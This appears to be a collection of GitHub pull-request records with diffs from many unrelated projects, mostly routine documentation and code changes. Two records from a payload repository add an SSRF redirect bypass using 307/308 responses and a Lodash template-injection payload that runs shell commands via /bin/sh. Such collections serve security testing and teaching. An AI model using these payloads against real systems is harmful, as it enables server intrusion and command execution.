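exec("from os import *", star_ns)   # binds every public name in os.__all__
exec("import os", plain_ns)         # binds just the name "os"

star_names = [n for n in star_ns if not n.startswith("_")]
plain_names = [n for n in plain_ns if not n.startswith("_")]
print(len(plain_names))   # 1
print(len(star_names) > 50)
```

For a module the size of AppKit, the per-name binding work (plus forcing any lazily-loaded attributes) is what the PR removes from the startup path.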
| https://api.github.com/repos/XX-net/XX-Net/pulls/2642 | 2016-04-02T14:58:05Z | 2016-04-03T03:42:50Z | 2016-04-03T03:42:50Z | 2016-04-03T03:42:50Z | 2,068 | XX-net/XX-Net | 17,146 |
Added information on 307 and 308 redirects | diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index a16cb7d839..acbea08252 100644
--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -255,6 +255,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
+3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection.
```
### Bypassing using type=url
| 307 and 308 redirects can be helpful when needing to send a POST request to a target while bypassing restrictions using redirection. | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/500 | 2022-05-19T09:57:17Z | 2022-05-19T10:29:02Z | 2022-05-19T10:29:02Z | 2022-05-19T10:29:02Z | 244 | swisskyrepo/PayloadsAllTheThings | 8,387 |
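The added tip relies on a difference in redirect semantics: for 301/302 (and always for 303), clients commonly rewrite a redirected POST into a GET and drop the body, while 307 (RFC 7231) and 308 (RFC 7538) require the original method and body to be preserved. A deliberately simplified model of that client-side rule, only for illustration:

```python
def method_after_redirect(method, status):
    # 301/302: browsers and most clients historically rewrite POST to GET.
    # 303: always redirects with GET.
    # 307/308: method and request body must be preserved.
    if status in (301, 302, 303) and method == "POST":
        return "GET"
    return method

print(method_after_redirect("POST", 302))  # GET
print(method_after_redirect("POST", 307))  # POST
print(method_after_redirect("POST", 308))  # POST
```

So a redirector on the whitelisted host that answers 307/308 lets the SSRF deliver the original POST body to the internal target.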
Add Airtable API to Documents & Productivity | diff --git a/README.md b/README.md
index b86ccccf7f..9c27dbd935 100644
--- a/README.md
+++ b/README.md
@@ -391,6 +391,7 @@ API | Description | Auth | HTTPS | CORS |
### Documents & Productivity
API | Description | Auth | HTTPS | CORS |
|---|---|---|---|---|
+| [Airtable](https://airtable.com/api) | Integrate with Airtable | `apiKey` | Yes | Unknown |
| [apilayer pdflayer](https://pdflayer.com) | HTML/URL to PDF | `apiKey` | Yes | Unknown |
| [Cloudmersive Document and Data Conversion](https://cloudmersive.com/convert-api) | HTML/URL to PDF/PNG, Office documents to PDF, image conversion | `apiKey` | Yes | Yes |
| [Code::Stats](https://codestats.net/api-docs) | Automatic time tracking for programmers | `apiKey` | Yes | No |
| <!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/1884 | 2021-07-23T04:29:00Z | 2021-07-31T22:07:40Z | 2021-07-31T22:07:40Z | 2021-07-31T22:15:39Z | 225 | public-apis/public-apis | 35,786 |
Clarified Concat example in docs. | diff --git a/docs/ref/models/database-functions.txt b/docs/ref/models/database-functions.txt
index acddc7cbe4a37..544c147ed257c 100644
--- a/docs/ref/models/database-functions.txt
+++ b/docs/ref/models/database-functions.txt
@@ -88,8 +88,9 @@ Usage examples::
Accepts a list of at least two text fields or expressions and returns the
concatenated text. Each argument must be of a text or char type. If you want
to concatenate a ``TextField()`` with a ``CharField()``, then be sure to tell
-Django that the ``output_field`` should be a ``TextField()``. This is also
-required when concatenating a ``Value`` as in the example below.
+Django that the ``output_field`` should be a ``TextField()``. Specifying an
+``output_field`` is also required when concatenating a ``Value`` as in the
+example below.
This function will never have a null result. On backends where a null argument
results in the entire expression being null, Django will ensure that each null
@@ -102,8 +103,11 @@ Usage example::
>>> from django.db.models.functions import Concat
>>> Author.objects.create(name='Margaret Smith', goes_by='Maggie')
>>> author = Author.objects.annotate(
- ... screen_name=Concat('name', V(' ('), 'goes_by', V(')'),
- ... output_field=CharField())).get()
+ ... screen_name=Concat(
+ ... 'name', V(' ('), 'goes_by', V(')'),
+ ... output_field=CharField()
+ ... )
+ ... ).get()
>>> print(author.screen_name)
Margaret Smith (Maggie)
| Fixed example in documentation:
- Use TextField instead of CharField, as the text above the example states it should be,
- Readjusted indentation to make it clearer that output_field is an argument to Concat() and not annotate()
- Use [] instead of () in Values to make it a bit easier to read with less brackets all over the place | https://api.github.com/repos/django/django/pulls/8900 | 2017-08-13T13:26:40Z | 2017-08-14T18:57:51Z | 2017-08-14T18:57:51Z | 2017-08-14T18:57:51Z | 385 | django/django | 51,031 |
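The docs being edited also note that `Concat` never yields a NULL result — null arguments are coerced to empty strings before joining. A plain-Python sketch of that guarantee using the example's values (no ORM involved; this `concat` is a stand-in for illustration, not Django's implementation):

```python
def concat(*parts):
    # Mirrors the documented guarantee: null segments become '' rather than
    # making the whole expression NULL.
    return "".join("" if p is None else str(p) for p in parts)

print(concat("Margaret Smith", " (", "Maggie", ")"))  # Margaret Smith (Maggie)
print(concat("Jane", " (", None, ")"))                # Jane ()
```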
feat: Get answers using preferred number of chunks | diff --git a/README.md b/README.md
index 9881dec3c..6d2121348 100644
--- a/README.md
+++ b/README.md
@@ -22,6 +22,7 @@ PERSIST_DIRECTORY: is the folder you want your vectorstore in
MODEL_PATH: Path to your GPT4All or LlamaCpp supported LLM
MODEL_N_CTX: Maximum token limit for the LLM model
EMBEDDINGS_MODEL_NAME: SentenceTransformers embeddings model name (see https://www.sbert.net/docs/pretrained_models.html)
+TARGET_SOURCE_CHUNKS: The amount of chunks (sources) that will be used to answer a question
```
Note: because of the way `langchain` loads the `SentenceTransformers` embeddings, the first time you run the script it will require internet connection to download the embeddings model itself.
diff --git a/example.env b/example.env
index 829078457..bcf13ebbb 100644
--- a/example.env
+++ b/example.env
@@ -2,4 +2,5 @@ PERSIST_DIRECTORY=db
MODEL_TYPE=GPT4All
MODEL_PATH=models/ggml-gpt4all-j-v1.3-groovy.bin
EMBEDDINGS_MODEL_NAME=all-MiniLM-L6-v2
-MODEL_N_CTX=1000
\ No newline at end of file
+MODEL_N_CTX=1000
+TARGET_SOURCE_DOCUMENTS=4
\ No newline at end of file
diff --git a/privateGPT.py b/privateGPT.py
index 7adab52d0..8fa10a6e0 100755
--- a/privateGPT.py
+++ b/privateGPT.py
@@ -16,6 +16,7 @@
model_type = os.environ.get('MODEL_TYPE')
model_path = os.environ.get('MODEL_PATH')
model_n_ctx = os.environ.get('MODEL_N_CTX')
+target_source_chunks = int(os.environ.get('TARGET_SOURCE_CHUNKS',4))
from constants import CHROMA_SETTINGS
@@ -24,7 +25,7 @@ def main():
args = parse_arguments()
embeddings = HuggingFaceEmbeddings(model_name=embeddings_model_name)
db = Chroma(persist_directory=persist_directory, embedding_function=embeddings, client_settings=CHROMA_SETTINGS)
- retriever = db.as_retriever()
+ retriever = db.as_retriever(search_kwargs={"k": target_source_chunks})
# activate/deactivate the streaming StdOut callback for LLMs
callbacks = [] if args.mute_stream else [StreamingStdOutCallbackHandler()]
# Prepare the LLM
| The current implementation uses 4 chunks by default. This commit adds the functionality of changing the number of chunks to be used in the generation of answers.
Answers #416 | https://api.github.com/repos/zylon-ai/private-gpt/pulls/460 | 2023-05-24T18:17:32Z | 2023-05-25T06:26:20Z | 2023-05-25T06:26:20Z | 2023-05-25T10:34:43Z | 565 | zylon-ai/private-gpt | 38,604 |
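The new setting is read from the environment with a default of 4 and passed to the retriever as `k`. A minimal sketch of the lookup (the `chunks_from_env` helper is hypothetical — the real code reads `os.environ` directly). Note that the diff's `example.env` adds `TARGET_SOURCE_DOCUMENTS` while `privateGPT.py` reads `TARGET_SOURCE_CHUNKS`, so with that example file unchanged the default of 4 would still apply:

```python
def chunks_from_env(env):
    # Same shape as the PR's lookup: int(os.environ.get('TARGET_SOURCE_CHUNKS', 4))
    return int(env.get("TARGET_SOURCE_CHUNKS", 4))

print(chunks_from_env({}))                              # 4
print(chunks_from_env({"TARGET_SOURCE_CHUNKS": "6"}))   # 6
# The resulting value is then wired into the vector store:
# retriever = db.as_retriever(search_kwargs={"k": target_source_chunks})
```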
[dbtv] Add new extractor | diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index e49ac3e5278..c43dfd7ea1f 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -62,6 +62,7 @@
DailymotionUserIE,
)
from .daum import DaumIE
+from .dbtv import DBTVIE
from .dotsub import DotsubIE
from .dreisat import DreiSatIE
from .drtv import DRTVIE
diff --git a/youtube_dl/extractor/dbtv.py b/youtube_dl/extractor/dbtv.py
new file mode 100644
index 00000000000..cf76dbf0533
--- /dev/null
+++ b/youtube_dl/extractor/dbtv.py
@@ -0,0 +1,76 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+import re
+
+from .common import InfoExtractor
+
+from ..utils import (
+ ExtractorError
+)
+
+class DBTVIE(InfoExtractor):
+ _VALID_URL = r'http://dbtv.no/(?P<id>[0-9]+)/?(?P<slug>.*)$'
+ _TEST = {
+ 'url': 'http://dbtv.no/3649835190001#Skulle_teste_ut_fornøyelsespark,_men_kollegaen_var_bare_opptatt_av_bikinikroppen',
+ 'md5': 'b89953ed25dacb6edb3ef6c6f430f8bc',
+ 'info_dict': {
+ 'id': '3649835190001',
+ 'ext': 'mp4',
+ 'title': 'Skulle teste ut fornøyelsespark, men kollegaen var bare opptatt av bikinikroppen',
+ 'description': 'md5:d681bf2bb7dd3503892cedb9c2d0e6f2',
+ 'thumbnail': 'http://gfx.dbtv.no/thumbs/still/33100.jpg',
+ 'timestamp': 1404039863,
+ 'upload_date': '20140629',
+ 'duration': 69544,
+ }
+ }
+
+ def _real_extract(self, url):
+ mobj = re.match(self._VALID_URL, url)
+ video_id = mobj.group('id')
+
+ # Download JSON file containing video info.
+ data = self._download_json('http://api.dbtv.no/discovery/%s' % video_id, video_id, 'Downloading media JSON')
+ # We only want the first video in the JSON API file.
+ video = data['playlist'][0]
+
+ # Check for full HD video, else use the standard video URL
+ for i in range(0, len(video['renditions'])):
+ if int(video['renditions'][i]['width']) == 1280:
+ video_url = video['renditions'][i]['URL']
+ break
+ else:
+ video_url = video['URL']
+
+ # Add access token to image or it will fail.
+ thumbnail = video['splash']
+
+ # Duration int.
+ duration = int(video['length'])
+
+ # Timestamp is given in milliseconds.
+ timestamp = float(str(video['publishedAt'])[0:-3])
+
+ formats = []
+
+ # Video URL.
+ if video['URL'] is not None:
+ formats.append({
+ 'url': video_url,
+ 'format_id': 'mp4',
+ 'ext': 'mp4'
+ })
+ else:
+ raise ExtractorError('No download URL found for video: %s.' % video_id, expected=True)
+
+ return {
+ 'id': video_id,
+ 'title': video['title'],
+ 'description': video['desc'],
+ 'thumbnail': thumbnail,
+ 'timestamp': timestamp,
+ 'duration': duration,
+ 'view_count': video['views'],
+ 'formats': formats,
+ }
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/3685 | 2014-09-05T09:27:45Z | 2014-09-05T12:54:36Z | 2014-09-05T12:54:36Z | 2014-09-05T12:55:44Z | 939 | ytdl-org/youtube-dl | 50,521 | |
Update README.md | diff --git a/README.md b/README.md
index 1d288783..a207bbfc 100644
--- a/README.md
+++ b/README.md
@@ -457,6 +457,7 @@ Further resources:
#### Deep Learning
* [Deeplearning4j](https://github.com/deeplearning4j/deeplearning4j) - Scalable deep learning for industry with parallel GPUs.
+* [Keras Beginner Tutorial](https://victorzhou.com/blog/keras-neural-network-tutorial/) - Friendly guide on using Keras to implement a simple Neural Network in Python
<a name="javascript"></a>
## Javascript
| added new source to Deep Learning on how to create neural network using Keras. | https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/613 | 2019-06-17T19:48:33Z | 2019-06-18T03:07:12Z | 2019-06-18T03:07:12Z | 2019-06-18T03:07:12Z | 145 | josephmisiti/awesome-machine-learning | 52,472 |
Enable asynchronous job submission in BigQuery Insert Job | diff --git a/airflow/providers/google/cloud/hooks/bigquery.py b/airflow/providers/google/cloud/hooks/bigquery.py
index feb90f4c10560..75da470fece30 100644
--- a/airflow/providers/google/cloud/hooks/bigquery.py
+++ b/airflow/providers/google/cloud/hooks/bigquery.py
@@ -1498,6 +1498,7 @@ def insert_job(
job_id: Optional[str] = None,
project_id: Optional[str] = None,
location: Optional[str] = None,
+ nowait: bool = False,
) -> BigQueryJob:
"""
Executes a BigQuery job. Waits for the job to complete and returns job id.
@@ -1514,6 +1515,7 @@ def insert_job(
characters. If not provided then uuid will be generated.
:param project_id: Google Cloud Project where the job is running
:param location: location the job is running
+ :param nowait: specify whether to insert job without waiting for the result
"""
location = location or self.location
job_id = job_id or self._custom_job_id(configuration)
@@ -1541,8 +1543,12 @@ def insert_job(
raise AirflowException(f"Unknown job type. Supported types: {supported_jobs.keys()}")
job = job.from_api_repr(job_data, client)
self.log.info("Inserting job %s", job.job_id)
- # Start the job and wait for it to complete and get the result.
- job.result()
+ if nowait:
+ # Initiate the job and don't wait for it to complete.
+ job._begin()
+ else:
+ # Start the job and wait for it to complete and get the result.
+ job.result()
return job
def run_with_configuration(self, configuration: dict) -> str:
diff --git a/tests/providers/google/cloud/hooks/test_bigquery.py b/tests/providers/google/cloud/hooks/test_bigquery.py
index 48f15fd2c9969..2468de2079cc8 100644
--- a/tests/providers/google/cloud/hooks/test_bigquery.py
+++ b/tests/providers/google/cloud/hooks/test_bigquery.py
@@ -54,8 +54,8 @@
TABLE_REFERENCE = TableReference.from_api_repr(TABLE_REFERENCE_REPR)
-class _BigQueryBaseTestClass(unittest.TestCase):
- def setUp(self) -> None:
+class _BigQueryBaseTestClass:
+ def setup_method(self) -> None:
class MockedBigQueryHook(BigQueryHook):
def _get_credentials_and_project_id(self):
return CREDENTIALS, PROJECT_ID
@@ -898,9 +898,10 @@ def test_run_query_with_arg(self, mock_insert):
_, kwargs = mock_insert.call_args
assert kwargs["configuration"]['labels'] == {'label1': 'test1', 'label2': 'test2'}
+ @pytest.mark.parametrize('nowait', [True, False])
@mock.patch("airflow.providers.google.cloud.hooks.bigquery.QueryJob")
@mock.patch("airflow.providers.google.cloud.hooks.bigquery.BigQueryHook.get_client")
- def test_insert_job(self, mock_client, mock_query_job):
+ def test_insert_job(self, mock_client, mock_query_job, nowait):
job_conf = {
"query": {
"query": "SELECT * FROM test",
@@ -910,10 +911,7 @@ def test_insert_job(self, mock_client, mock_query_job):
mock_query_job._JOB_TYPE = "query"
self.hook.insert_job(
- configuration=job_conf,
- job_id=JOB_ID,
- project_id=PROJECT_ID,
- location=LOCATION,
+ configuration=job_conf, job_id=JOB_ID, project_id=PROJECT_ID, location=LOCATION, nowait=nowait
)
mock_client.assert_called_once_with(
@@ -928,7 +926,12 @@ def test_insert_job(self, mock_client, mock_query_job):
},
mock_client.return_value,
)
- mock_query_job.from_api_repr.return_value.result.assert_called_once_with()
+ if nowait:
+ mock_query_job.from_api_repr.return_value._begin.assert_called_once()
+ mock_query_job.from_api_repr.return_value.result.assert_not_called()
+ else:
+ mock_query_job.from_api_repr.return_value._begin.assert_not_called()
+ mock_query_job.from_api_repr.return_value.result.assert_called_once()
def test_dbapi_get_uri(self):
assert self.hook.get_uri().startswith('bigquery://')
@@ -2014,7 +2017,7 @@ def test_create_external_table_labels(self, mock_create):
)
_, kwargs = mock_create.call_args
- self.assertDictEqual(kwargs['table_resource']['labels'], labels)
+ assert kwargs['table_resource']['labels'] == labels
@mock.patch("airflow.providers.google.cloud.hooks.bigquery.BigQueryHook.create_empty_table")
def test_create_external_table_description(self, mock_create):
| - Add nowait flag to the insert_job method
- When nowait is True, the execution won't wait till the job results are available.
- By default, the job execution will wait till job results are available.
cc @dstandish @kaxil
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/main/UPDATING.md).
| https://api.github.com/repos/apache/airflow/pulls/21385 | 2022-02-07T10:54:16Z | 2022-02-11T06:16:10Z | 2022-02-11T06:16:10Z | 2022-03-24T10:37:12Z | 1,083 | apache/airflow | 14,711 |
Update Lodash SSTI | diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 66d0219c79..36af6926e5 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -56,6 +56,9 @@
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Plugins](#plugins)
+ - [JavaScript - Lodash](#Lodash)
+ - [Lodash - Basic Injection](#Lodash---Basic-Injection)
+ - [Lodash - Command Execution](#Lodash---Command-Execution)
- [Python - Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
- [Java - Pebble](#pebble)
@@ -743,6 +746,51 @@ registerPlugin({
---
+## Lodash
+
+[Official website](https://lodash.com/docs/4.17.15)
+
+### Lodash - Basic Injection
+
+How to create a template:
+
+```javascript
+const _ = require('lodash');
+string = "{{= username}}"
+const options = {
+ evaluate: /\{\{(.+?)\}\}/g,
+ interpolate: /\{\{=(.+?)\}\}/g,
+ escape: /\{\{-(.+?)\}\}/g,
+};
+
+_.template(string, options);
+```
+
+- **string:** The template string.
+- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
+- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
+- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
+
+For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
+
+```javascript
+{{= _.VERSION}}
+${= _.VERSION}
+<%= _.VERSION %>
+
+
+{{= _.templateSettings.evaluate }}
+${= _.VERSION}
+<%= _.VERSION %>
+
+```
+
+### Lodash - Command Execution
+
+```
+{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
+```
+
## Mako
[Official website](https://www.makotemplates.org/)
| Added Lodash on the SSTI chapter. All the payloads are tested during the down under ctf 2023. | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/670 | 2023-09-03T01:25:34Z | 2023-09-03T15:30:52Z | 2023-09-03T15:30:52Z | 2023-09-03T15:30:53Z | 606 | swisskyrepo/PayloadsAllTheThings | 8,443 |
Add back chess.com | diff --git a/removed_sites.json b/removed_sites.json
index 8878fc6d0..2bccbfd67 100644
--- a/removed_sites.json
+++ b/removed_sites.json
@@ -652,16 +652,6 @@
"username_claimed": "nielsrosanna",
"username_unclaimed": "noonewouldeverusethis7"
},
- "Chess": {
- "errorMsg": "\"valid\": false",
- "errorType": "message",
- "regexCheck": "^[a-z1-9]{3,25}$",
- "url": "https://www.chess.com/member/{}",
- "urlMain": "https://www.chess.com/",
- "urlProbe": "https://www.chess.com/callback/user/valid?username={}",
- "username_claimed": "blue",
- "username_unclaimed": "noonewouldeverusethis7"
- },
"Codeforces": {
"errorType": "response_url",
"errorUrl": "https://codeforces.com/",
diff --git a/removed_sites.md b/removed_sites.md
index 276a65674..3e996efc0 100644
--- a/removed_sites.md
+++ b/removed_sites.md
@@ -1341,22 +1341,6 @@ As of 2022-05-1, FanCentro returns false positives. Will later in new version of
},
```
-
-# Chess
-As og 2022-05-01, Chess.com returns false positives
-```
- "Chess": {
- "errorMsg": "\"valid\": false",
- "errorType": "message",
- "regexCheck": "^[a-z1-9]{3,25}$",
- "url": "https://www.chess.com/member/{}",
- "urlMain": "https://www.chess.com/",
- "urlProbe": "https://www.chess.com/callback/user/valid?username={}",
- "username_claimed": "blue",
- "username_unclaimed": "noonewouldeverusethis7"
- },
-```
-
## Codeforces
As og 2022-05-01, Codeforces returns false positives
```
diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json
index 48a020787..46fde4ce7 100644
--- a/sherlock/resources/data.json
+++ b/sherlock/resources/data.json
@@ -371,6 +371,16 @@
"username_claimed": "cute18cute",
"username_unclaimed": "noonewouldeverusethis77777"
},
+ "Chess": {
+ "errorMsg": "Username is valid",
+ "errorType": "message",
+ "regexCheck": "^[a-z1-9]{3,25}$",
+ "url": "https://www.chess.com/member/{}",
+ "urlMain": "https://www.chess.com/",
+ "urlProbe": "https://www.chess.com/callback/user/valid?username={}",
+ "username_claimed": "blue",
+ "username_unclaimed": "noonewouldeverusethis7"
+ },
"CloudflareCommunity": {
"errorType": "status_code",
"url": "https://community.cloudflare.com/u/{}",
diff --git a/sites.md b/sites.md
index d3f62d728..bd8c6c522 100644
--- a/sites.md
+++ b/sites.md
@@ -1,4 +1,4 @@
-## List Of Supported Sites (353 Sites In Total!)
+## List Of Supported Sites (355 Sites In Total!)
1. [2Dimensions](https://2Dimensions.com/)
1. [3dnews](http://forum.3dnews.ru/)
1. [7Cups](https://www.7cups.com/)
@@ -225,6 +225,7 @@
1. [Slashdot](https://slashdot.org)
1. [SlideShare](https://slideshare.net/)
1. [Smule](https://www.smule.com/)
+1. [Snapchat](https://www.snapchat.com)
1. [SoundCloud](https://soundcloud.com/)
1. [SourceForge](https://sourceforge.net/)
1. [SoylentNews](https://soylentnews.org)
@@ -315,6 +316,7 @@
1. [jbzd.com.pl](https://jbzd.com.pl/)
1. [jeuxvideo](http://www.jeuxvideo.com)
1. [kofi](https://ko-fi.com)
+1. [koo](https://www.kooapp.com)
1. [kwork](https://www.kwork.ru/)
1. [labpentestit](https://lab.pentestit.ru/)
1. [last.fm](https://last.fm/)
@@ -326,6 +328,7 @@
1. [mastodon.xyz](https://mastodon.xyz/)
1. [mercadolivre](https://www.mercadolivre.com.br)
1. [metacritic](https://www.metacritic.com/)
+1. [minds](https://www.minds.com)
1. [moikrug](https://moikrug.ru/)
1. [mstdn.io](https://mstdn.io/)
1. [nairaland.com](https://www.nairaland.com/)
@@ -350,5 +353,4 @@
1. [xHamster](https://xhamster.com)
1. [znanylekarz.pl](https://znanylekarz.pl)
1. [zoomit](https://www.zoomit.ir)
-1. [koo](https://www.kooapp.com)
-1. [minds](https://www.minds.com)
+1. [Chess](https://www.chess.com/)
| Added Chess.com back by fixing the false positive issue it had earlier. | https://api.github.com/repos/sherlock-project/sherlock/pulls/1418 | 2022-07-20T16:13:36Z | 2022-07-20T16:15:42Z | 2022-07-20T16:15:42Z | 2022-09-08T15:19:48Z | 1,316 | sherlock-project/sherlock | 36,562 |
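The `regexCheck` field added for Chess.com can be exercised locally before any network probe is made; a minimal sketch (the pattern is copied verbatim from the entry above, everything else is illustrative):

```python
import re

# Pattern copied verbatim from the new entry's "regexCheck" field.
CHESS_USERNAME_RE = re.compile(r"^[a-z1-9]{3,25}$")

def is_plausible_chess_username(username: str) -> bool:
    """Client-side pre-filter: a checker can skip the urlProbe request
    entirely when the candidate username cannot match the site's rules."""
    return CHESS_USERNAME_RE.fullmatch(username) is not None
```

Filtering with `regexCheck` first is how obviously invalid usernames are rejected without hitting `urlProbe`.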
implement ensure_localized in datetimelikeArrayMixin | diff --git a/pandas/core/arrays/datetimelike.py b/pandas/core/arrays/datetimelike.py
index 6d8e41900ce2d..c01b04991e52b 100644
--- a/pandas/core/arrays/datetimelike.py
+++ b/pandas/core/arrays/datetimelike.py
@@ -1079,6 +1079,41 @@ def _evaluate_compare(self, other, op):
result[mask] = filler
return result
+ def _ensure_localized(self, arg, ambiguous='raise', nonexistent='raise',
+ from_utc=False):
+ """
+ Ensure that we are re-localized.
+
+ This is for compat as we can then call this on all datetimelike
+ arrays generally (ignored for Period/Timedelta)
+
+ Parameters
+ ----------
+ arg : Union[DatetimeLikeArray, DatetimeIndexOpsMixin, ndarray]
+ ambiguous : str, bool, or bool-ndarray, default 'raise'
+ nonexistent : str, default 'raise'
+ from_utc : bool, default False
+ If True, localize the i8 ndarray to UTC first before converting to
+ the appropriate tz. If False, localize directly to the tz.
+
+ Returns
+ -------
+ localized array
+ """
+
+ # reconvert to local tz
+ tz = getattr(self, 'tz', None)
+ if tz is not None:
+ if not isinstance(arg, type(self)):
+ arg = self._simple_new(arg)
+ if from_utc:
+ arg = arg.tz_localize('UTC').tz_convert(self.tz)
+ else:
+ arg = arg.tz_localize(
+ self.tz, ambiguous=ambiguous, nonexistent=nonexistent
+ )
+ return arg
+
DatetimeLikeArrayMixin._add_comparison_ops()
diff --git a/pandas/core/indexes/datetimelike.py b/pandas/core/indexes/datetimelike.py
index dd2537c11a94c..db0cb88b06b2b 100644
--- a/pandas/core/indexes/datetimelike.py
+++ b/pandas/core/indexes/datetimelike.py
@@ -111,36 +111,17 @@ def _evaluate_compare(self, other, op):
def _ensure_localized(self, arg, ambiguous='raise', nonexistent='raise',
from_utc=False):
- """
- Ensure that we are re-localized.
-
- This is for compat as we can then call this on all datetimelike
- indexes generally (ignored for Period/Timedelta)
-
- Parameters
- ----------
- arg : DatetimeIndex / i8 ndarray
- ambiguous : str, bool, or bool-ndarray, default 'raise'
- nonexistent : str, default 'raise'
- from_utc : bool, default False
- If True, localize the i8 ndarray to UTC first before converting to
- the appropriate tz. If False, localize directly to the tz.
-
- Returns
- -------
- localized DTI
- """
-
- # reconvert to local tz
- if getattr(self, 'tz', None) is not None:
- if not isinstance(arg, ABCIndexClass):
- arg = self._simple_new(arg)
- if from_utc:
- arg = arg.tz_localize('UTC').tz_convert(self.tz)
- else:
- arg = arg.tz_localize(
- self.tz, ambiguous=ambiguous, nonexistent=nonexistent
- )
+ # See DatetimeLikeArrayMixin._ensure_localized.__doc__
+
+ if getattr(self, 'tz', None):
+ # ensure_localized is only relevant for tz-aware DTI
+ from pandas.core.arrays import DatetimeArrayMixin as DatetimeArray
+ dtarr = DatetimeArray(self)
+ result = dtarr._ensure_localized(arg,
+ ambiguous=ambiguous,
+ nonexistent=nonexistent,
+ from_utc=from_utc)
+ return type(self)(result, name=self.name)
return arg
def _box_values_as_index(self):
 | This method is used by `TimelikeOps._round`, so it needs to be implemented on the array mixin before we can move forward on #24064.
@TomAugspurger this places the method in a different location than you did in #24024 and made a small docstring edit, but otherwise should be compatible. | https://api.github.com/repos/pandas-dev/pandas/pulls/24378 | 2018-12-21T03:24:02Z | 2018-12-21T16:31:23Z | 2018-12-21T16:31:23Z | 2020-04-05T17:43:39Z | 917 | pandas-dev/pandas | 45,763 |
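A stdlib-only sketch of the two localization paths `_ensure_localized` distinguishes. A fixed-offset timezone stands in for a real tz and cannot model the DST ambiguity that the real method's `ambiguous`/`nonexistent` parameters exist for; all names here are illustrative:

```python
from datetime import datetime, timedelta, timezone

FIXED_TZ = timezone(timedelta(hours=-5), "UTC-05:00")  # stand-in for a real tz

def ensure_localized(naive: datetime, tz: timezone, from_utc: bool = False) -> datetime:
    """Mirror of the two branches: with from_utc=True the naive timestamp
    is treated as UTC and converted to tz; otherwise it is treated as
    wall-clock time in tz and localized directly."""
    if from_utc:
        return naive.replace(tzinfo=timezone.utc).astimezone(tz)
    return naive.replace(tzinfo=tz)
```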
Import ABC from collections.abc for Python 3.10 compatibility. | diff --git a/deepspeed/autotuning/tuner/utils.py b/deepspeed/autotuning/tuner/utils.py
index bf1f51f34de6..f87c7563966a 100755
--- a/deepspeed/autotuning/tuner/utils.py
+++ b/deepspeed/autotuning/tuner/utils.py
@@ -1,7 +1,7 @@
import numpy as np
import itertools
from ..utils import *
-import collections
+import collections.abc
def index_to_feature(p, dims):
@@ -53,7 +53,7 @@ def flatten(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
- if isinstance(v, collections.MutableMapping):
+ if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
diff --git a/deepspeed/runtime/config_utils.py b/deepspeed/runtime/config_utils.py
index 199c773f4379..83c48bbee5cb 100755
--- a/deepspeed/runtime/config_utils.py
+++ b/deepspeed/runtime/config_utils.py
@@ -7,6 +7,7 @@
"""
import json
import collections
+import collections.abc
# adapted from https://stackoverflow.com/a/50701137/9201239
@@ -31,13 +32,13 @@ def iterencode(self, o, _one_shot=False, level=0):
return f"{o:e}"
else:
return f"{o}"
- elif isinstance(o, collections.Mapping):
+ elif isinstance(o, collections.abc.Mapping):
x = [
f'\n{prefix}"{k}": {self.iterencode(v, level=level)}' for k,
v in o.items()
]
return "{" + ', '.join(x) + f"\n{prefix_close}" + "}"
- elif isinstance(o, collections.Sequence) and not isinstance(o, str):
